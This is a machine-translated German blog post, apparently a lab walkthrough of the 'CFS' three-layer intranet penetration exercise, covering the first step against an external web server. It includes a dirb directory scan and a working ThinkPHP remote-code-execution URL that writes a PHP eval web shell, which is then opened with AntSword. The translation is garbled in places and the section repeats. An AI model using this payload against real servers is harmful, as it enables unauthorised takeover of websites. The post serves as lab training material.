Technologieaustausch

CFS dreischichtiges Intranet-Penetration-externes Netzwerkmanagement (1)

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

Inhaltsverzeichnis

Externes Netzwerkmanagement

Lassen Sie uns es zuerst sprengen, um zu sehen, ob es eine Möglichkeit zum Angriff gibt.

Ich habe den verdächtigen Weg ausprobiert und festgestellt, dass es sich um das Thinkphp-Framework handelt. Ich kannte auch die Version, also lasst uns am nächsten Tag kämpfen.

in PHP schreiben

​Bearbeiten und schreiben Sie erfolgreich in PHP, laden Sie es einfach am nächsten Tag herunterBearbeiten

Ant Sword RCE-Versuchslink

Erfolgreich gemanagt

Externes Netzwerkmanagement

Lassen Sie uns es zuerst sprengen, um zu sehen, ob es eine Möglichkeit zum Angriff gibt.

Sie können dirsearch, dirb, gobuster und andere Tools ausprobieren

dirb http://192.168.20.130/

Ich habe den verdächtigen Weg ausprobiert und festgestellt, dass es sich um das Thinkphp-Framework handelt. Ich kannte auch die Version, also lasst uns am nächsten Tag kämpfen.

in PHP schreiben

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Erfolgreich in PHP geschrieben, leicht zu bekommen.

http://192.168.20.130/public/shell.php

Ant Sword RCE-Versuchslink

Erfolgreich gemanagt

Persönliches Profil

Er widmet sich seit mehr als 30 Jahren der Technologieforschung und beherrscht verschiedene Sprachen wie Java, Linux, Javascript, PHP, CSS usw. Er hat viele Beiträge im Open-Source-Bereich geleistet, Entwicklerdokumentationsstation, um einige Themen in der Technologieentwicklung als zukünftige Referenz zu teilen

meine Kontaktdaten

Post